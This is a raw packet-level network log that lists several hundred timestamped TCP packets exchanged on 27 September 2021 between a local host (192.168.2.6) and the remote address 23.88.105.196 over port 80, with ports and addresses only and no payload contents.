Sep 27, 2021 18:33:09.084702969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084714890 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084724903 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084749937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084773064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084774017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084796906 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084819078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084830046 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084842920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084865093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084868908 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084918022 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084922075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084973097 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084979057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085002899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085026026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085026979 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085047960 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085069895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085071087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085095882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085129023 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085151911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085165024 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085175991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085197926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085222960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085252047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085277081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085278988 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085298061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085321903 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085333109 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085345030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085366964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085388899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.085391998 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.085444927 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087306976 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087447882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087485075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087532043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087539911 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087555885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087573051 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087578058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087603092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087608099 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087626934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087641954 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087687969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087709904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087730885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087753057 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087755919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087779999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087781906 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087802887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087811947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087826967 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087838888 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087851048 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087872028 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087873936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087897062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087917089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087918997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087944984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087954044 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.087966919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087987900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.087996960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088010073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088032961 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088037014 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088054895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088068008 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088078022 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088099957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088113070 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088124990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088149071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088150024 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088171005 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088181019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088192940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088215113 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088222980 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088238955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088260889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088263035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088284016 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088294029 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088310003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088330984 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088334084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088359118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088371992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088381052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088403940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088413000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088424921 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088447094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088454962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088469028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088478088 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088494062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088517904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088519096 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088540077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088562012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088563919 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088583946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088594913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088604927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088627100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088640928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088648081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088674068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088687897 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088696957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088762045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088814020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088836908 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088860035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088871002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088881969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088907003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088931084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088934898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088953018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088970900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.088989973 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.088993073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089018106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089030981 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089041948 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089063883 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089072943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089087963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089103937 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089109898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089133024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089134932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089152098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089169025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089184999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089207888 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089231014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089243889 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089257002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089270115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089283943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089293957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089317083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089318037 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089349031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089361906 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089385033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089385986 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089410067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089412928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089436054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089437962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089461088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089471102 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089487076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089500904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089509010 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089531898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089543104 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089554071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089575052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089586020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089600086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089623928 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089633942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089649916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089658022 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089679003 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089689970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089698076 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089711905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089730978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089749098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089771032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089786053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089808941 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089835882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089842081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089859962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.089883089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.089919090 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.090707064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090730906 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090751886 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090774059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090802908 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.090847969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.090899944 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090925932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090945959 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.090946913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090971947 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.090996027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091027975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091029882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091068983 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091068983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091093063 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091111898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091137886 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091141939 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091167927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091185093 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091191053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091207027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091212988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091234922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091236115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091258049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091259956 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091279984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091298103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091304064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091326952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091337919 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091351986 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091373920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091382027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091396093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091415882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091417074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091439962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091444016 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091460943 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091483116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091485023 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091505051 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091526985 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091530085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091552019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091553926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091577053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091593981 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091598988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.091630936 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.091674089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.092849016 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.096378088 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105268002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105300903 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105324984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105351925 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105349064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105379105 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105400085 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105422020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105465889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105477095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105525017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105525017 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105571032 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105597019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105618954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105642080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105652094 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105667114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105679035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105691910 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105715990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105719090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105746031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105765104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105787992 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105789900 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105812073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.105834961 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105875969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.105951071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106004953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106039047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106065989 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106090069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106101036 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106113911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106137037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106138945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106161118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106173038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106184959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106208086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106218100 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106232882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106256962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106260061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106286049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106296062 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106311083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106322050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106354952 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106355906 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106379986 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106389046 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106404066 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106409073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106426954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106437922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106453896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106466055 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106481075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106494904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106504917 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106528044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106530905 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106585026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106585026 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106627941 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106687069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106755972 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106776953 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106832981 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106847048 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106887102 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106890917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106914043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106939077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.106939077 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106965065 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.106983900 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.107158899 CEST	80	49741	23.88.105.196	192.168.2.6
